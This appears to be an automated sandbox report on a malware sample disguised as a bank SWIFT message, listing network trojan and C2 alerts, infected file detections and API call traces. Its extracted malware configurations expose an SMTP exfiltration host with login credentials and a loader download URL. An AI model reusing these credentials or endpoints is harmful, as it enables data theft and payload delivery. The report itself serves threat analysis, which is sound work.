                    2024-11-18T09:56:51.616371+010020181411A Network Trojan was detected54.244.188.17780192.168.2.749883TCP
                    2024-11-18T09:56:53.165851+010020181411A Network Trojan was detected18.141.10.10780192.168.2.749888TCP
                    2024-11-18T09:56:55.358034+010020181411A Network Trojan was detected44.221.84.10580192.168.2.749906TCP
                    2024-11-18T09:57:33.379985+010020181411A Network Trojan was detected47.129.31.21280192.168.2.750011TCP
                    2024-11-18T09:57:35.196947+010020181411A Network Trojan was detected13.251.16.15080192.168.2.750013TCP
                    2024-11-18T09:57:40.703360+010020181411A Network Trojan was detected34.246.200.16080192.168.2.750018TCP
                    2024-11-18T09:57:48.496579+010020181411A Network Trojan was detected35.164.78.20080192.168.2.750025TCP
                    2024-11-18T09:57:49.313279+010020181411A Network Trojan was detected3.94.10.3480192.168.2.750026TCP
                    2024-11-18T09:58:08.560846+010020181411A Network Trojan was detected34.211.97.4580192.168.2.750043TCP
                    2024-11-18T09:58:15.584854+010020181411A Network Trojan was detected18.208.156.24880192.168.2.750054TCP
                    2024-11-18T09:58:39.026226+010020181411A Network Trojan was detected3.254.94.18580192.168.2.750091TCP
                    2024-11-18T09:58:59.043100+010020181411A Network Trojan was detected18.246.231.12080192.168.2.750124TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:51.616371+010020377711A Network Trojan was detected54.244.188.17780192.168.2.749883TCP
                    2024-11-18T09:56:53.165851+010020377711A Network Trojan was detected18.141.10.10780192.168.2.749888TCP
                    2024-11-18T09:56:55.358034+010020377711A Network Trojan was detected44.221.84.10580192.168.2.749906TCP
                    2024-11-18T09:57:33.379985+010020377711A Network Trojan was detected47.129.31.21280192.168.2.750011TCP
                    2024-11-18T09:57:35.196947+010020377711A Network Trojan was detected13.251.16.15080192.168.2.750013TCP
                    2024-11-18T09:57:40.703360+010020377711A Network Trojan was detected34.246.200.16080192.168.2.750018TCP
                    2024-11-18T09:57:48.496579+010020377711A Network Trojan was detected35.164.78.20080192.168.2.750025TCP
                    2024-11-18T09:57:49.313279+010020377711A Network Trojan was detected3.94.10.3480192.168.2.750026TCP
                    2024-11-18T09:58:08.560846+010020377711A Network Trojan was detected34.211.97.4580192.168.2.750043TCP
                    2024-11-18T09:58:15.584854+010020377711A Network Trojan was detected18.208.156.24880192.168.2.750054TCP
                    2024-11-18T09:58:39.026226+010020377711A Network Trojan was detected3.254.94.18580192.168.2.750091TCP
                    2024-11-18T09:58:59.043100+010020377711A Network Trojan was detected18.246.231.12080192.168.2.750124TCP
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-11-18T09:56:57.035382+010028508511Malware Command and Control Activity Detected192.168.2.74991454.244.188.17780TCP
                    2024-11-18T09:57:58.560314+010028508511Malware Command and Control Activity Detected192.168.2.75002882.112.184.19780TCP
                    2024-11-18T09:59:02.553719+010028508511Malware Command and Control Activity Detected192.168.2.75013272.52.178.2380TCP
                    2024-11-18T10:00:03.724220+010028508511Malware Command and Control Activity Detected192.168.2.760112172.234.222.14380TCP

                    Joe Sandbox Signatures

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Antivirus detection for dropped file
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeAvira: detection malicious, Label: W32/Infector.Gen
                    Found malware configuration
                    Source: alpha.exe.4508.13.memstrminMalware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "s82.gocheapweb.com\"", "Username": "info2@j-fores.com", "Password": "london@1759 "}
                    Source: Juqmtmya.PIF.27.drMalware Configuration Extractor: DBatLoader {"Download Url": ["https://gxe0.com/yak2/233_Juqmtmyadyy"]}
                    Multi AV Scanner detection for submitted file
                    Source: Ziraat_Bankasi_Swift_Mesaji_DXB04958T.cmdReversingLabs: Detection: 13%
                    AI detected suspicious sample
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                    Machine Learning detection for dropped file
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jucheck.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\AutoIt3Help.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARMHelper.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Java\Java Update\jaureg.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.134\117.0.5938.134_117.0.5938.132_chrome_updater.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\java.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Check.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\AutoIt3\Au3Info_x64.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaw.exeJoe Sandbox ML: detected
                    Source: C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exeJoe Sandbox ML: detected
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1352C2C CryptFindOIDInfo,memset,CryptRegisterOIDInfo,GetLastError,#357,9_2_00007FF7F1352C2C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1352F38 ?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,InitializeCriticalSection,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,LocalFree,lstrcmpW,#357,CoInitialize,#357,#357,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,?_set_se_translator@@YAP6AXIPEAU_EXCEPTION_POINTERS@@@ZP6AXI0@Z@Z,RevertToSelf,#356,#357,LocalFree,NCryptFreeObject,CoUninitialize,DeleteCriticalSection,9_2_00007FF7F1352F38
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140D28C CryptFindOIDInfo,CryptEnumOIDInfo,CryptFindOIDInfo,CryptFindOIDInfo,#358,9_2_00007FF7F140D28C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417290 NCryptIsKeyHandle,#359,#360,#357,#358,9_2_00007FF7F1417290
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137D240 #357,CryptFindOIDInfo,#357,LocalFree,9_2_00007FF7F137D240
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B92D8 CertEnumCertificatesInStore,CertGetCRLContextProperty,CertSetCTLContextProperty,GetLastError,#357,#357,CertEnumCertificatesInStore,CryptMsgControl,GetLastError,#357,CryptMsgGetAndVerifySigner,GetLastError,#357,CryptMsgGetAndVerifySigner,#357,CertFreeCertificateContext,CertGetCRLContextProperty,CertEnumCertificatesInStore,#357,#357,#207,LocalFree,#357,#357,CertFreeCertificateContext,CompareFileTime,CertFreeCertificateContext,9_2_00007FF7F13B92D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DF2F0 BCryptCreateHash,#205,#357,#357,#357,#357,??_V@YAXPEAX@Z,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13DF2F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137D304 #357,CryptFindOIDInfo,#359,LocalAlloc,CryptEncodeObjectEx,GetLastError,LocalFree,LocalFree,LocalFree,9_2_00007FF7F137D304
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD30C BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,9_2_00007FF7F13CD30C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AB2B4 #357,CryptHashCertificate,GetLastError,#357,memcmp,#358,9_2_00007FF7F13AB2B4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E32A8 CryptGetProvParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF7F13E32A8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A92C4 memset,CryptHashCertificate,GetLastError,CryptHashCertificate,GetLastError,GetLastError,GetLastError,#357,#254,LocalAlloc,wcsstr,LocalAlloc,LocalAlloc,#357,memmove,GetLastError,GetProcAddress,GetLastError,GetLastError,#359,#357,#357,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,FreeLibrary,9_2_00007FF7F13A92C4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C32D0 #359,CryptGetProvParam,GetLastError,#357,CryptReleaseContext,9_2_00007FF7F13C32D0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C5164 GetLastError,#357,CryptEncodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF7F13C5164
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF168 CryptDuplicateKey,GetLastError,#357,CryptEncrypt,GetLastError,CryptEncrypt,GetLastError,CryptDestroyKey,9_2_00007FF7F13CF168
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417178 BCryptCloseAlgorithmProvider,#360,9_2_00007FF7F1417178
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C3188 CryptAcquireContextW,GetLastError,#359,#359,CryptAcquireContextW,GetLastError,9_2_00007FF7F13C3188
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140511C GetSystemInfo,CryptFindOIDInfo,#359,CreateFileW,GetLastError,#357,#359,GetFileSize,#357,CreateFileMappingW,GetLastError,#359,#357,LocalAlloc,BCryptCreateHash,#360,MapViewOfFile,BCryptHashData,#360,UnmapViewOfFile,LocalAlloc,GetLastError,#357,GetLastError,BCryptFinishHash,#360,LocalAlloc,LocalFree,#357,UnmapViewOfFile,CloseHandle,CloseHandle,BCryptDestroyHash,#360,LocalFree,LocalFree,9_2_00007FF7F140511C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1399134 CryptQueryObject,GetLastError,#357,CertOpenStore,GetLastError,CertOpenStore,GetLastError,CertAddSerializedElementToStore,GetLastError,CertAddEncodedCRLToStore,GetLastError,CertAddEncodedCTLToStore,GetLastError,CertAddEncodedCertificateToStore,GetLastError,#357,CertCloseStore,9_2_00007FF7F1399134
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417124 BCryptGenerateKeyPair,#360,9_2_00007FF7F1417124
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1439208 #357,NCryptEnumKeys,#360,#358,9_2_00007FF7F1439208
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1417214 NCryptIsKeyHandle,#357,CryptReleaseContext,GetLastError,9_2_00007FF7F1417214
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B51A4 #360,#357,#359,#207,CryptFindOIDInfo,#357,GetLastError,#357,#207,#360,#254,#358,LocalFree,LocalFree,LocalFree,9_2_00007FF7F13B51A4
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14171C8 BCryptDestroyKey,#360,9_2_00007FF7F14171C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E31C0 CryptGetKeyParam,#205,GetLastError,#357,#357,#357,#357,SetLastError,9_2_00007FF7F13E31C0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E11C8 NCryptVerifySignature,#205,#357,#357,#357,#357,9_2_00007FF7F13E11C8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FB464 CryptEncodeObjectEx,SetLastError,9_2_00007FF7F13FB464
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E9480 memmove,BCryptDecrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,memmove,BCryptEncrypt,#205,#357,#357,#357,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13E9480
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF488 #357,LocalAlloc,memmove,CryptDuplicateKey,GetLastError,CryptDecrypt,GetLastError,CryptDestroyKey,LocalFree,9_2_00007FF7F13CF488
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141141C GetLastError,CryptDecodeObjectEx,GetLastError,#357,LocalFree,9_2_00007FF7F141141C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E342C CryptImportKey,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E342C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1345438 memset,#246,#357,#357,GetLastError,#357,CertFindExtension,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,CryptReleaseContext,CryptAcquireContextW,LocalFree,9_2_00007FF7F1345438
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14114F0 GetEnvironmentVariableW,#205,#205,#203,CryptDestroyHash,CryptReleaseContext,CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptReleaseContext,GetLastError,#357,#357,#203,#357,#357,#357,#357,#203,LocalFree,#203,#357,#357,#207,#203,#203,LocalFree,#203,#203,CryptDestroyHash,CryptReleaseContext,9_2_00007FF7F14114F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FB4EC CryptDecodeObjectEx,SetLastError,9_2_00007FF7F13FB4EC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A3504 CreateFileW,GetLastError,#357,GetFileSize,GetLastError,#357,SetFilePointer,GetLastError,#357,CertFreeCertificateContext,CertFreeCertificateContext,CryptDestroyKey,CryptReleaseContext,CloseHandle,9_2_00007FF7F13A3504
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E34F8 CryptImportPublicKeyInfo,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF7F13E34F8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140F4A0 CryptHashPublicKeyInfo,SetLastError,9_2_00007FF7F140F4A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136B36C GetLastError,CryptHashCertificate,GetLastError,CryptHashCertificate2,GetLastError,SysAllocStringByteLen,#357,SysFreeString,#357,#357,#357,LocalFree,SysFreeString,9_2_00007FF7F136B36C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3390 CryptGetUserKey,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF7F13E3390
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F137B324 CryptDecodeObject,GetLastError,#357,#357,LocalFree,9_2_00007FF7F137B324
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A5338 wcsrchr,#357,#357,LocalAlloc,memmove,wcsrchr,GetLastError,#360,#357,#357,LocalFree,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F13A5338
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1377340 GetModuleHandleW,GetProcAddress,GetLastError,BCryptExportKey,#360,LocalAlloc,CryptHashCertificate2,GetLastError,CryptHashCertificate2,GetLastError,#357,LocalFree,9_2_00007FF7F1377340
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F139B350 CryptFindLocalizedName,CertEnumPhysicalStore,GetLastError,#357,9_2_00007FF7F139B350
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,9_2_00007FF7F13CB3D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A13F0 CryptAcquireContextW,GetLastError,#357,CryptCreateHash,GetLastError,CryptHashData,CryptHashData,GetLastError,CryptImportPublicKeyInfo,CryptVerifySignatureW,CertCreateCertificateContext,#357,LocalFree,GetLastError,GetLastError,GetLastError,GetLastError,#357,LocalFree,LocalFree,CryptDestroyKey,CryptDestroyHash,CryptReleaseContext,9_2_00007FF7F13A13F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C53E8 CryptEncodeObjectEx,GetLastError,#357,9_2_00007FF7F13C53E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C33A0 CryptVerifyCertificateSignature,CertCompareCertificateName,9_2_00007FF7F13C33A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F141739C CryptAcquireContextW,GetLastError,#360,#360,SetLastError,9_2_00007FF7F141739C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13F33B0 CertFindExtension,#357,CryptDecodeObject,GetLastError,#357,#357,9_2_00007FF7F13F33B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F14193A0 CryptGetUserKey,GetLastError,#357,CryptAcquireContextW,GetLastError,CryptImportKey,GetLastError,LocalFree,CryptDestroyKey,CryptDestroyKey,CryptReleaseContext,9_2_00007FF7F14193A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CB664 I_CryptFindLruEntry,I_CryptGetLruEntryData,I_CryptReleaseLruEntry,9_2_00007FF7F13CB664
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1355664 #256,#357,CryptHashCertificate2,GetLastError,#254,#254,#357,#207,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,LocalFree,#359,9_2_00007FF7F1355664
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136D660 GetDesktopWindow,LocalFree,#357,CertDuplicateCertificateContext,GetLastError,#357,#357,#357,#357,#357,#207,LocalFree,#358,#357,#358,#357,#357,#357,#357,#357,NCryptIsKeyHandle,#357,#357,NCryptIsKeyHandle,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,#357,LocalFree,LocalFree,LocalFree,CertFreeCertificateContext,CryptSetProvParam,GetLastError,#357,CryptReleaseContext,LocalFree,9_2_00007FF7F136D660
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B366C CryptVerifyCertificateSignature,GetLastError,CryptVerifyCertificateSignatureEx,GetLastError,#357,9_2_00007FF7F13B366C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1409688 CryptFindOIDInfo,#357,#360,#360,#360,9_2_00007FF7F1409688
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136F630 CryptAcquireContextW,GetLastError,#357,SetLastError,9_2_00007FF7F136F630
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13DF644 NCryptDeleteKey,#205,#357,#357,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,_CxxThrowException,9_2_00007FF7F13DF644
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140F650 CryptHashCertificate2,SetLastError,9_2_00007FF7F140F650
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3654 CryptReleaseContext,#205,GetLastError,#357,#357,SetLastError,9_2_00007FF7F13E3654
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CF6D8 #357,CryptDuplicateKey,GetLastError,CryptEncrypt,GetLastError,LocalAlloc,memmove,CryptEncrypt,GetLastError,LocalAlloc,CryptDestroyKey,LocalFree,9_2_00007FF7F13CF6D8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E36E8 CryptSetHashParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E36E8
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13FD6A0 CertOpenStore,GetLastError,#357,CryptMsgOpenToDecode,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,CryptMsgUpdate,GetLastError,#357,#357,LocalFree,LocalAlloc,#357,memmove,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgGetParam,GetLastError,CryptMsgClose,CertCloseStore,LocalFree,LocalFree,9_2_00007FF7F13FD6A0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13976B0 #359,CryptAcquireCertificatePrivateKey,GetLastError,#357,#358,#359,#358,#358,LocalFree,LocalFree,#357,CryptFindCertificateKeyProvInfo,GetLastError,#357,LocalFree,LocalFree,CryptReleaseContext,9_2_00007FF7F13976B0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F140F570 CryptHashCertificate,SetLastError,9_2_00007FF7F140F570
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13AB55C CertFreeCertificateContext,CertCreateCertificateContext,GetLastError,CertDuplicateCertificateContext,#357,#358,CertCompareCertificateName,CryptVerifyCertificateSignatureEx,GetLastError,#357,#357,CertFreeCertificateContext,CertVerifyTimeValidity,#357,9_2_00007FF7F13AB55C
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3590 CryptImportPublicKeyInfoEx2,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E3590
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1419580 memset,#357,CryptCreateHash,GetLastError,#357,CryptGenRandom,GetLastError,CryptHashData,GetLastError,CryptSignHashW,GetLastError,LocalAlloc,CryptSignHashW,GetLastError,CryptImportPublicKeyInfo,GetLastError,CryptVerifySignatureW,GetLastError,#357,CryptDestroyHash,CryptDestroyKey,LocalFree,CryptReleaseContext,9_2_00007FF7F1419580
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13A55F0 #357,#360,GetLastError,#360,#359,NCryptDeleteKey,#360,#357,LocalFree,LocalFree,9_2_00007FF7F13A55F0
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13C95FC BCryptOpenAlgorithmProvider,#357,BCryptCreateHash,BCryptHashData,BCryptHashData,CertGetCRLContextProperty,BCryptHashData,BCryptHashData,BCryptFinishHash,BCryptDestroyHash,BCryptCloseAlgorithmProvider,9_2_00007FF7F13C95FC
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F136D5C2 CertCloseStore,CryptMsgClose,LocalFree,LocalFree,LocalFree,LocalFree,9_2_00007FF7F136D5C2
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13E3860 CryptSetProvParam,#205,GetLastError,#357,#357,#357,SetLastError,9_2_00007FF7F13E3860
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13B9878 strcmp,strcmp,strcmp,#357,#357,CompareFileTime,LocalFree,CryptMsgClose,CertCloseStore,CompareFileTime,#357,#357,9_2_00007FF7F13B9878
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F1377884 GetLastError,CryptFindOIDInfo,#357,#357,LocalFree,9_2_00007FF7F1377884
                    Source: C:\Users\Public\kn.exeCode function: 9_2_00007FF7F13CD850 #357,Sleep,BCryptCloseAlgorithmProvider,I_CryptFreeLruCache,9_2_00007FF7F13CD850
